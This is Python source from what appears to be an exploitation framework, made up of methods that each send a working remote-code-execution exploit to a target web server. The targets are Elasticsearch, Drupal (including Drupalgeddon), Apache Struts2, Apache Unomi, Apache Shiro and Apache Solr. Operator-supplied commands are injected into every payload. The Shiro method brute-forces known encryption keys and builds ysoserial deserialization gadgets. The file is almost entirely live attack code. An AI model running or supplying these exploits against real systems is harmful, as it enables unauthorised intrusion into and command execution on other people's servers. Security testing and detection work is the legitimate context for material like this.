def cve_2014_3120(self):
self.pocname = "Elasticsearch: CVE-2014-3120"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
self.data_rce = self.payload_cve_2014_3120.replace(
"RECOMMAND", self.CMD)
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.request = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.r = list(json.loads(
self.request.text)["hits"]["hits"])[0]["fields"]["command"][0]
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2019_6340(self):
self.pocname = "Drupal: CVE-2019-6340"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.r = "PoCWating"
self.path = "/node/?_format=hal_json"
self.cmd_len = len(self.CMD)
self.payload = self.payload_cve_2019_6340 % (self.cmd_len, self.CMD,
self.url)
self.headers = {
'User-Agent':
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Connection': "close",
'Content-Type': "application/hal+json",
'Accept': "*/*",
'Cache-Control': "no-cache"
}
try:
if self.VULN == 'False':
self.request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
verify.generic_output(self.request.text, self.pocname,
self.method, self.rawdata, self.info,
self.env)
# if r"LISTEN" not in self.request.text:
# if r"uid=" not in self.request.text:
# if self.request.status_code == 403 and r"u0027access" in self.request.text:
# self.r = "PoCSuCCeSS"
# verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info, self.env)
# else:
# verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
# else:
# verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
else:
self.request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.r = self.request.text.split("}")[1]
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_devMode(self):
self.pocname = "Apache Struts2: S2-devMode"
self.method = "get"
self.rawdata = "null"
self.info = PocType_.rce()
self.payload = self.payload_s2_devMode.replace("RECOMMAND",self.CMD)
try:
self.request = requests.get(self.url+self.payload, headers=headers, timeout=self.TIMEOUT, verify=False, allow_redirects=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_059(self):
self.pocname = "Apache Struts2: S2-059"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.payload = self.payload_s2_059.replace("RECOMMAND",self.CMD)
if r"?" not in self.url:
self.url = self.url + "?id="
try:
self.request = requests.post(self.url, data=self.payload, headers=headers, timeout=self.TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_061(self):
self.pocname = "Apache Struts2: S2-061"
self.method = "get"
self.rawdata = "null"
self.info = PocType_.rce()
self.payload = self.payload_s2_061.replace("RECOMMAND",self.CMD)
try:
self.request = requests.get(self.url+self.payload, headers=headers, timeout=self.TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
self.page = self.request.text
self.page = etree.HTML(self.page)
self.r = self.page.xpath('//a[@id]/@id')[0]
verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2020_13942(self):
self.pocname = "Apache Unomi: CVE-2020-13942"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.r = "PoCWating"
self.payload = self.payload_cve_2020_13942.replace(
"RECOMMAND", self.CMD)
self.headers = {
'Host': '34.87.38.169:8181',
'User-Agent':
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
self.request = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.rep = list(
json.loads(self.request.text)
["trackedConditions"])[0]["parameterValues"]["pagePath"]
if self.VULN == 'False':
if r"/tracker/" in self.rep:
self.r = "PoCSuSpEct"
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
else:
self.r = "Command Executed Successfully (But No Echo)"
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_046(self):
self.pocname = "Apache Struts2: S2-046"
self.headers = {
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Content-Type':'multipart/form-data; boundary=---------------------------'
}
self.rawdata = "null"
self.info = PocType_.rce()
self.method = "post"
self.payload = self.payload_s2_046.replace("RECOMMAND",self.CMD)
try:
self.request = requests.post(self.url, data=self.payload, headers=self.headers, timeout=self.TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2015_1427(self):
self.pocname = "Elasticsearch: CVE-2015-1427"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
self.data_rce = self.payload_cve_2015_1427.replace(
"RECOMMAND", self.CMD)
self.host = self.hostname + ":" + str(self.port)
self.headers_text = {
'Host': "" + self.host,
'Accept': '*/*',
'Connection': 'close',
'Accept-Language': 'en',
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
'Content-Type': 'application/text'
}
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.request = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers_text,
timeout=self.TIMEOUT,
verify=False)
self.r = list(json.loads(
self.request.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2018_7600(self):
self.pocname = "Drupal: CVE-2018-7600"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.r = "PoCWating"
self.payload = self.payload_cve_2018_7600.replace(
"RECOMMAND", self.CMD)
self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
try:
if self.VULN == 'False':
self.request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
if r"LISTEN" not in self.request.text and r"class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E" in self.request.text:
self.r = "PoCSuCCeSS"
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
else:
verify.generic_output(self.request.text, self.pocname,
self.method, self.rawdata, self.info,
self.env)
else:
self.request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
verify.generic_output(self.request.text, self.pocname,
self.method, self.rawdata, self.info,
self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_052(self):
self.pocname = "Apache Struts2: S2-052"
self.payload = self.payload_s2_052.replace("RECOMMAND",self.CMD)
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.headers = {
'Accept': 'text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Content-Type': 'application/xml'
}
try:
self.request = requests.post(self.url, data=self.payload, headers=self.headers, timeout=self.TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_048(self):
self.pocname = "Apache Struts2: S2-048"
self.method = "post"
self.rawdata = "null"
self.info = PocType_.rce()
self.method = "post"
if r"saveGangster.action" not in self.url:
self.u = self.url+"/integration/saveGangster.action"
self.data = {
'name': self.payload_s2_048.replace("RECOMMAND",self.CMD),
'age': '233',
'__checkbox_bustedBefore': 'true',
'description': '233'
}
try:
self.request = requests.post(self.u, data=self.data, headers=headers, timeout=self.TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2016_4437(self):
self.pocname = "Apache Shiro: CVE-2016-4437"
self.corename = "null"
self.rawdata = None
self.info = "null"
self.method = "get"
self.base64_cmd = base64.b64encode(str.encode(self.CMD))
self.cmd = self.base64_cmd.decode('ascii')
self.r = "PoCWating"
self.headers = {
'User-agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
'cmd': self.CMD #通过发送头部字段实现命令执行回显
}
self.key_lists = [
'kPH+bIxk5D2deZiIxcaaaA==', '4AvVhmFLUs0KTA3Kprsdag==',
'Z3VucwAAAAAAAAAAAAAAAA==', 'fCq+/xW488hMTCD+cmJ3aQ==',
'0AvVhmFLUs0KTA3Kprsdag==', '1AvVhdsgUs0FSA3SDFAdag==',
'1QWLxg+NYmxraMoxAXu/Iw==', '25BsmdYwjnfcWmnhAciDDg==',
'2AvVhdsgUs0FSA3SDFAdag==', '3AvVhmFLUs0KTA3Kprsdag==',
'5AvVhmFLUs0KTA3Kprsdag=='
]
self.gadget_lists = [
'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2',
'CommonsCollections3', 'CommonsCollections4',
'CommonsCollections5', 'CommonsCollections6',
'CommonsCollections7', 'CommonsCollections8',
'CommonsCollections9', 'CommonsCollections10'
]
self.echo_lists = [
'SpringEcho1', 'SpringEcho2', 'Tomcat6Echo', 'Tomcat7_8Echo',
'Tomcat9Echo', 'WeblogicEcho1'
]
try:
if self.VULN == 'False':
self.DL = Dnslog()
url0 = self.DL.dns_host()
url1 = 'http://' + url0
payload = 'aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740010{0}74000071007e0005740004687474707078740017{1}78'.format(
binascii.hexlify(url0.encode()).decode(),
binascii.hexlify(url1.encode()).decode())
payload = binascii.a2b_hex(payload)
BS = AES.block_size
pad = lambda s: s + (
(BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
for self.key in self.key_lists:
encryptor = AES.new(base64.b64decode(self.key), mode, iv)
file_body = pad(payload)
base64_ciphertext = base64.b64encode(
iv + encryptor.encrypt(file_body))
self.request = requests.get(
self.url,
headers=self.headers,
cookies={'rememberMe': base64_ciphertext.decode()},
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
if self.DL.result():
self.r = "PoCSuCCeSS"
self.info = PocType_.rce(
) + " [key: " + self.key + " ] [gadget: " + "URLDNS" + " ]"
verify.generic_output(self.r, self.pocname,
self.method, self.rawdata,
self.info, self.env)
for self.gadget in self.gadget_lists:
for self.echo in self.echo_lists:
self.gadget_payload = ysoserial_payload(
self.gadget, "directive:" + self.echo)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(
BS - len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(self.key),
mode, iv)
file_body = pad(self.gadget_payload)
base64_ciphertext = base64.b64encode(
iv +
encryptor.encrypt(file_body)).decode()
self.request = requests.get(
self.url,
headers=self.headers,
cookies={'rememberMe': base64_ciphertext},
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(
self.request).decode('utf-8', 'ignore')
if "VuLnEcHoPoCSuCCeSS" in self.request.text:
self.info = PocType_.rce(
) + " [key: " + self.key + " ] [gadget: " + self.gadget + " ] [echo: " + self.echo + " ] [platform: " + self.platform + " ]"
verify.generic_output(
self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
break
else:
continue
break
break
if self.r != "PoCSuCCeSS":
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
else:
self.key = SHIRO_KEY
self.gadget = SHIRO_GADGET
self.echo = SHIRO_ECHO
self.gadget_payload = ysoserial_payload(
self.gadget, "directive:" + self.echo)
#self.gadget_payload = ysoserial_payload(self.gadget, self.CMD)
BS = AES.block_size
pad = lambda s: s + (
(BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(self.key), mode, iv)
file_body = pad(self.gadget_payload)
base64_ciphertext = base64.b64encode(
iv + encryptor.encrypt(file_body)).decode()
self.request = requests.get(
self.url,
headers=self.headers,
cookies={'rememberMe': base64_ciphertext},
timeout=self.TIMEOUT,
verify=False)
if '<!DOCTYPE' in self.request.text:
text = self.request.text[:self.request.text.
find('<!DOCTYPE')].strip()
#searchobj = re.search(r'(.*)\n<!DOCTYPE(.*)', self.request.text) #返回第一个匹配对象
#text = searchobj.group(1)
verify.generic_output(text, self.pocname, self.method,
self.rawdata, self.info, self.env)
#elif '\r\n<!DOCTYPE' in self.request.text:
#text = self.request.text[:self.request.text.find('\r\n<!DOCTYPE')]
#searchobj = re.search(r'(.*)\r\n<!DOCTYPE(.*)', self.request.text) #返回第一个匹配对象
#text = searchobj.group(1)
# verify.generic_output(text, self.pocname, self.method, self.rawdata, self.info, self.env)
else:
verify.generic_output(self.request.text, self.pocname,
self.method, self.rawdata, self.info,
self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2018_7602(self):
self.pocname = "Drupal: CVE-2018-7602"
self.method = "get"
self.rawdata = "null"
self.info = PocType_.rce()
self.r = "PoCWating"
self.headers = {
'User-agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
}
try:
if self.VULN == 'False':
self.request = requests.get(self.url + "/CHANGELOG.txt",
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
self.request.text)
if self.request.status_code == 200 and r"Drupal" in self.request.text:
if '7.59' not in self.allver and '8.5.3' not in self.allver:
self.r = "PoCSuCCeSS"
self.info += " [drupal:" + self.allver[0] + "]"
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
else:
self.session = requests.Session()
self.get_params = {'q': 'user/login'}
self.post_params = {
'form_id': 'user_login',
'name': DRUPAL_U,
'pass': DRUPAL_P,
'op': 'Log in'
}
self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.get_params = {'q': 'user'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.user_id = self.soup.find('meta', {
'property': 'foaf:name'
}).get('about')
if "?q=" in self.user_id:
self.user_id = self.user_id.split("=")[1]
self.get_params = {'q': self.user_id + '/cancel'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_token = self.form.find('input', {
'name': 'form_token'
}).get('value')
self.get_params = {
'q':
self.user_id + '/cancel',
'destination':
self.user_id +
'/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
+ self.CMD
}
self.post_params = {
'form_id': 'user_cancel_confirm_form',
'form_token': self.form_token,
'_triggering_element_name': 'form_id',
'op': 'Cancel account'
}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_build_id = self.form.find('input', {
'name': 'form_build_id'
}).get('value')
self.get_params = {
'q':
'file/ajax/actions/cancel/#options/path/' +
self.form_build_id
}
self.post_params = {'form_build_id': self.form_build_id}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
verify.generic_output(self.r.text, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2017_12629(self):
self.pocname = "Apache Solr: CVE-2017-12629"
self.corename = "null"
self.newcore = ''.join(
random.choices(string.ascii_letters + string.digits, k=6))
self.payload1 = self.payload_cve_2017_12629.replace(
"RECOMMAND", self.CMD).replace("newcore", self.newcore)
self.payload2 = '[{"id": "test"}]'
self.rawdata = None
self.info = None
self.r = "PoCWating"
self.urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
self.headers_solr1 = {
'Host': "localhost",
'Accept': "*/*",
'User-Agent':
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
'Connection': "close"
}
self.headers_solr2 = {
'Host': "localhost",
'ccept-Language': "en",
'User-Agent':
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
'Connection': "close",
'Content-Type': "application/json"
}
self.method = "post"
self.r = "PoCWating"
self.headers = {
'User-agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
#'Content-Type' : 'application/x-www-form-urlencoded',
}
try:
self.request = requests.get(url=self.url + "/solr/",
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
if self.request.status_code == 200:
self.get_ver = re.findall(r'img/favicon\.ico\?_=(.*)"',
self.request.text)[0]
self.ver = self.get_ver.replace(".", "")
self.request = requests.get(url=self.urlcore,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
try:
self.corename = list(json.loads(
self.request.text)["status"])[0]
except:
pass
self.request = requests.post(self.url + "/solr/" +
str(self.corename) + "/config",
data=self.payload1,
headers=self.headers_solr1,
timeout=self.TIMEOUT,
verify=False)
if self.request.status_code == 200 and self.corename != "null" and int(
self.ver) < 710:
self.r = "PoCSuCCeSS"
self.request = requests.post(self.url + "/solr/" +
str(self.corename) + "/update",
data=self.payload2,
headers=self.headers_solr2,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.info = PocType_.rce(
) + " [activemq version: " + self.get_ver + "]" + " [newcore:" + self.newcore + "] "
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2019_17558(self):
self.pocname = "Apache Solr: CVE-2019-17558"
self.corename = None
self.payload_1 = self.payload_cve_2019_17558.replace("RECOMMAND", "id")
self.payload_2 = self.payload_cve_2019_17558.replace(
"RECOMMAND", self.CMD)
self.method = "get"
self.urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
self.rawdata = None
self.r = "PoCWating"
try:
self.request = requests.get(url=self.urlcore,
timeout=self.TIMEOUT,
verify=False)
try:
self.corename = list(json.loads(
self.request.text)["status"])[0]
except:
pass
self.info = PocType_.rce() + " [corename:" + str(
self.corename) + "]"
self.urlapi = self.url + "/solr/" + str(self.corename) + "/config"
self.headers_json = {'Content-Type': 'application/json'}
self.set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
if self.VULN == 'False':
self.request = requests.post(self.urlapi,
data=self.set_api_data,
headers=self.headers_json,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
if self.request.status_code == 200 and self.corename != None:
self.r = "PoCSuCCeSS"
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
else:
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
else:
self.request = requests.post(self.urlapi,
data=self.set_api_data,
headers=self.headers_json,
timeout=self.TIMEOUT,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.request = requests.get(
self.url + "/solr/" + str(self.corename) + self.payload_2,
timeout=self.TIMEOUT,
verify=False)
verify.generic_output(self.request.text, self.pocname,
self.method, self.rawdata, self.info,
self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def cve_2019_0193(self):
self.pocname = "Apache Solr: CVE-2019-0193"
self.corename = "null"
self.info = None
self.method = "get"
self.r = "PoCWating"
self.payload = self.payload_cve_2019_0193.replace(
"RECOMMAND", quote(self.CMD, 'utf-8'))
self.solrhost = self.hostname + ":" + str(self.port)
self.headers = {
'Host': "" + self.solrhost,
'User-Agent':
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
'Accept': "application/json, text/plain, */*",
'Accept-Language':
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
'Accept-Encoding': "zip, deflate",
'Referer': self.url + "/solr/",
'Content-type': "application/x-www-form-urlencoded",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close"
}
self.urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
self.rawdata = "null"
try:
self.request = requests.get(url=self.urlcore,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
try:
self.corename = list(json.loads(
self.request.text)["status"])[0]
except:
pass
self.urlconfig = self.url + "/solr/" + str(
self.corename) + "/admin/mbeans?cat=QUERY&wt=json"
# check solr mode: "solr.handler.dataimport.DataImportHandler"
self.request = requests.get(url=self.urlconfig,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
self.urlcmd = self.url + "/solr/" + str(
self.corename) + "/dataimport"
self.request = requests.post(self.urlcmd,
data=self.payload,
headers=self.headers,
timeout=self.TIMEOUT,
verify=False)
if self.request.status_code == 200 and self.corename != "null":
self.r = "PoCSuCCeSS"
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.info = PocType_.rce() + " [corename:" + str(
self.corename) + "]"
verify.generic_output(self.r, self.pocname, self.method,
self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)
def s2_045(self):
self.pocname = "Apache Struts2: S2-045"
self.page = "null"
self.vuln_number = 0
self.method = "get"
self.headers1 = {
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Content-Type': '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].'
'addHeader("F**K",233*233)}.multipart/form-data'
}
self.headers2 = {
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Content-Type': self.payload_s2_045.replace("RECOMMAND", self.CMD)
}
self.rawdata = "null"
self.info = PocType_.rce()
try:
if self.VULN == 'False':
self.request = requests.get(self.url, headers=self.headers1, timeout=self.TIMEOUT, verify=False)
if r"54289" in self.request.headers['F**K']:
vuln_number = 1
self.fuck045 = self.request.headers['F**K']
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
verify.generic_output(self.fuck045, self.pocname, self.method, self.rawdata, self.info, self.env)
else:
try:
self.request = urllib.request.Request(self.url, headers=self.headers2)
self.page = urllib.request.urlopen(self.request, timeout=self.TIMEOUT).read()
except http.client.IncompleteRead as error:
self.page = error.partial
except Exception as error:
self.text045 = str(error)
if r"timed out" in self.text045:
verify.timeout_output(self.pocname)
elif r"Connection refused" in self.text045:
verify.connection_output(self.pocname)
else:
verify.generic_output(self.text045, self.pocname, self.method, self.rawdata, self.info, self.env)
try:
self.r = self.page.decode("utf-8")
except:
self.r = self.page.decode("gbk")
else:
self.r = bytes.decode(self.page)
verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info, self.env)
else:
try:
self.request = urllib.request.Request(self.url, headers=self.headers2)
self.page = urllib.request.urlopen(self.request, timeout=self.TIMEOUT).read()
except http.client.IncompleteRead as error:
self.page = error.partial
self.r = self.page.decode("utf-8")
print (self.r)
verify.generic_output(self.page, self.pocname, self.method, self.rawdata, self.info, self.env)
except Exception as error:
self.text045 = str(error)
if r"timed out" in self.text045:
verify.timeout_output(self.pocname)
elif r"Connection refused" in self.text045:
verify.connection_output(self.pocname)
else:
# print ("?")
verify.generic_output(self.text045, self.pocname, self.method, self.rawdata, self.info, self.env)
try:
self.r = self.page.decode("utf-8")
except:
self.r = self.page.decode("gbk")
else:
self.r = bytes.decode(self.page)
verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info, self.env)
except requests.exceptions.Timeout as error:
verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
verify.connection_output(self.pocname)
except Exception as error:
verify.error_output(str(error), self.pocname)